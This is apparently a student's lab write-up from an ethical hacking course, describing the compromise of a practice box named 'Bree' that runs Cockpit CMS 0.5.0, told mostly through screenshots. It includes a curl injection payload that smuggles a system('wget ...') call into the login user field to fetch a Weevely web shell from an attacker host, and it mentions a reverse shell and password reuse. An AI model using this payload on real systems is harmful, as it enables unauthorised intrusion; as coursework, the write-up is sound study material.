> For the complete documentation index, see [llms.txt](https://paul-gleason.gitbook.io/sec-335-eth.-hacking-and-pen.-testing/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://paul-gleason.gitbook.io/sec-335-eth.-hacking-and-pen.-testing/labs/final-bree.md).

# Final: Bree

IP Address:

<figure><img src="https://lh3.googleusercontent.com/0hB6MRg6x5Igj9JNMhlwkMykHbRPE4FQY9F4wGQNIlcWm8jI3FsF5LqmHiqdO9Awa4cfi8ovOSZofle00KfoMLVAauo_VAk6xZY5pUvWKsvlqpZkmLmtzuuMbGTBBacWJmafbswxX-u_UbUaSolNtgY" alt=""><figcaption></figcaption></figure>

Services:

<figure><img src="https://lh4.googleusercontent.com/8E6YcZCMswtOEooO8IKD6ZO89x03qy4PQ-aO0zWHXd_K0-qoTaoONpEoNeSmRV8qaHVuD5IC2s0E5tVeTDlaESq7xUna_K9LsexeJ9EMw7Y3nnvjL3RhaWUbFYMP3Ls38YvxFmJYNEr2tIR-jZgOQUw" alt=""><figcaption></figcaption></figure>

Exploits:

<figure><img src="https://lh4.googleusercontent.com/JYcoTnCDLp8-tPpk8lJrcUrnRhwLBIlXxv7Jxsm8l_tIvN1Z6ix8R8ClFrjZ_ia01RdmdUzXjKdW54e180Ze-qhMR5BYWWfqMqypL0kQaGVc-yPt2-RRAQ9Td293y5FknW9eZoD-QiJlo7cTAy0kL38" alt=""><figcaption></figcaption></figure>

<figure><img src="https://lh4.googleusercontent.com/UXUo42r3Mg8AQVs1zwGxx7T0gzi5A8QjPr74ICHK89tXS5UOZpbBRynts3a0Qp6QFzbGQyWkaXfrlMqWNBFJp2vlmpiENdYjtvL4G_Q8jHiUp9AcPZM_X2pj3qgMOtVoadKAJciXmr10eKCUYI4-9mE" alt=""><figcaption></figcaption></figure>

Webpage:

<figure><img src="https://lh6.googleusercontent.com/hRQnEk7OJ7brS1fIgshbVfQjoY2L56NbiCS87SZN7VQeD3aPPPbAXYEaIWZT2xSSkFX5MJwxX-xYV7roRr-GgUgDB3LKyByAi64nudRGdDsQXu_UgHgdmEoUSCw9QEswUkIiVsvI1o_POPX0xAvMr0U" alt=""><figcaption></figcaption></figure>

Had to change host file:

<figure><img src="https://lh4.googleusercontent.com/btJ3O8n2WCBKwo7i_1Z1OLMYipoxOFY0N3KjYd0ntChMDNladPuYzxqrvVLtcOG_VL_p-NrxP8c5NM-FwZyBm2uh2PhiXttBzFHULiNPX3Ht9A70j1-sabxgajf3fZjcdC5vUwGYa4G4tTD5dSPNGeg" alt=""><figcaption></figcaption></figure>

Now webpage is: Cockpit version is 0.5.0

<figure><img src="https://lh5.googleusercontent.com/wLIxQu5IIWeDFop59fA9EstPIcYEM9nMdA510xjRxV25JuzKS-qZxYE15afjfmAQKVJ62geU9ZA81HndZdJBm3hp5HpFpgzC3crI79OX18gPBQRnmkYwlPbT3XsEincSWvfvJwsUKQ-4s5cMssKMq6M" alt=""><figcaption></figcaption></figure>

<figure><img src="https://lh3.googleusercontent.com/XfOTDfUBx8wIFXXqgWH0e0s6fhDQbCFo3KHBc9Wgjg15J2zXGTmbFRvf-4hanRs4_-niHP6--ONtqbpcQe_arDTVD-qjolTnyfOd44q0jQ5iA_IBJ3Me4WMqLfccrkJv0RUwSULqkFS02ESRiDqbsyM" alt=""><figcaption></figcaption></figure>

Cockpit exploit 50185.py:

<figure><img src="https://lh3.googleusercontent.com/7A1vGdInLlIslgGqBGyco6oYjttrNcTXJ0uqSMSuNZ0z-wuQgvlZHENt62_AUiF8Go5iCbUfpaJVbxHL3u28nfnV5KU19KkCpht_hi-n66oZ0T3jWDBmh20apMSGogdzISD8dlYM81t6oQ7-rckcjWM" alt=""><figcaption></figcaption></figure>

Users Found: admin, barliman, strider

Reset Password:&#x20;

<figure><img src="https://lh6.googleusercontent.com/VhVsXOROtV21YeUMJf-s6j6zCc1MTzKZguHeozfte9-oTtl5Gqag16HqkjzMVOJ5M5dwL3en_g12KSScp3jYsDvs8zA-Jg7hZ1tfRubXsPI-AGVbjwd7ETmsspCD_SOT5GrWShOM2uhRVC-H-9NeotI" alt=""><figcaption></figcaption></figure>

Nothing can be found inside the web ui:

<figure><img src="https://lh6.googleusercontent.com/SEyR0cfLQ9y6tpfsE9fDuP28l7GG83RpVvJyggf2eOACjk41zxqZzT5Op5_e3lEBbtDImnOUcwVX-w46nLL07LxaUv4YblyOsPZGGT8dnwaZRjI6F68dLJIvilpoSXOJQwc_uiscxPc_PHPfKTvFilk" alt=""><figcaption></figcaption></figure>

<br>

Now trying exploit 49390.txt: Format was found here: <https://danaepp.com/exploit-apis-with-curl>&#x20;

```bash
RESULT=$(curl $OTP_URL \
          -H 'Content-Type: application/json' \
         --data-raw "{\"email\":\"$EMAIL\",\"otp\":\"$OTP\", \"password\":\"$NEW_PWD\"}"
```

<figure><img src="https://lh5.googleusercontent.com/fL5Xt3tUvMzKgLoFfprawPAhC61yyMHI8aOeEGQz3My-kid61jJwEHrhxPnBtE2o5l-e7NjLce6l9eumeTm0sOBD0ku0klZ-V-WJUQTCfyRplikOXOUvchM4XGG55JOz7nt3zX0CE4J6RvxsVonKR4o" alt=""><figcaption></figcaption></figure>

Making Weevely and uploading:

<figure><img src="https://lh6.googleusercontent.com/kx54Ke6In4otGcesC4VvS1hpKFLAP48vo9johWYlXYBHZi4uYlB8nBYBhyG3OVtX6rbYmGgA4Ehy-Lw36xGOkW1tlF36nWcxxLsTaJnszcT-J5aCIW7aHDDoF7XYc1jZyDxLIbl2iikaOw6GtVO8oY8" alt=""><figcaption></figcaption></figure>

{% code overflow="wrap" %}

```bash
curl -X POST -H "Content-Type: application/json; charset=UTF-9" -d "{\"auth\":{\"user\":\"barliman'.system('wget https://<LHOST>:<LPORT>/<Weevely_Shell>').'\",\"password\":\"b\"}}" http://bree.shire.org/auth/check
```

{% endcode %}

<figure><img src="https://lh3.googleusercontent.com/YL_D5VVz8e3OF3FVv0UcVgy_td3BRTyMG8yDpL-tsDNMvt7RPBi1kIrwFaZzY8gxxzBUbX-i0_m8hpiZG_mlE7AhxGnH4gAeYc5s0fTAXfPm3z4tNDQ55XRV6M62DmNw4CcX8An-k9RsykswSf0gICI" alt=""><figcaption></figcaption></figure>

<figure><img src="https://lh4.googleusercontent.com/MjWhjR2ttp7qo2r54w1oPvcSK9BW2jHPbS0fRlXXWS0zIkjPHJlJ_3538QhDioEMesyVWuwMZKZACadSVhit4Ze-ntwiPKURxBqFfGW-xXXNy_jBduBdUWcdY5pMt1xAHWQ_tKhOQCz7zEe2gM9hAwA" alt=""><figcaption></figcaption></figure>

Reverse Shell:

<figure><img src="https://lh4.googleusercontent.com/MxItzHtbqJE6EmaFmINy1f0EzWfJHQ44VfS-BQp8XQV2q8YRS0KUmtlyvhejpCoJk3yh4_givVnV9kiWKGHovRLwU_Vk_lrRoLq17Ed0ah_P-m4y1qmZwG6iTjAzKoGwb7rCDE_MVNDvJL4WFvCCK-o" alt=""><figcaption></figcaption></figure>

Privilege Escalation: Password was reused from the bios.shire.org box

<figure><img src="https://lh4.googleusercontent.com/nCY1U0kYhhIOfma1XdVFmnI04KEoTCkEKmYjfHOS2JOIm2Orqp1bqkzzsW8GVh5_tFEJoXJqkNSXmSEup4uFq_OEyhzAOnC75YS7bSNX_F9azsZWhApxnm3o6AOWdMAfJoSBIlvahJOyA1XI1BmmVR4" alt=""><figcaption></figcaption></figure>

Flags:

<figure><img src="https://lh3.googleusercontent.com/JP5DrtrJs0kbyihetoCN4rXWAUYmsKUKlD9dA3OKPknmxYqD9c8TuPvhfP3T6ks7SitRcbo-QdwYzYFL1SmnGPZRR-tCnoFx_PVJFCaen8kGmJD8nCNAO6MV5jZjxQcuPcEqlXhXbrDjYKRjBwZj2wA" alt=""><figcaption></figcaption></figure>

<br>
